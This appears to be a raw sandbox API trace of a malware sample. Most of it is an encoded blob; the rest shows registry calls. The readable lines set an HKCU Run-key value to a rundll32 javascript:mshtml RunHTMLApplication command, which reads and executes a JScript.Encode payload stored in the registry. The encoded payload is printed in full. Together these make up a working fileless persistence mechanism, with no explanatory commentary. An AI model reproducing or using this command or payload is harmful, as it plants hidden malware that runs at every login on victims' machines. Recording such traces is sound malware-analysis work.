qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0127.279] RegCloseKey (hKey=0x248) returned 0x0 [0127.279] Sleep (dwMilliseconds=0x1388) [0132.285] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x248, lpdwDisposition=0x0) returned 0x0 [0132.285] NtSetValueKey (in: KeyHandle=0x248, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0132.286] RegSetValueExW (in: hKey=0x248, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 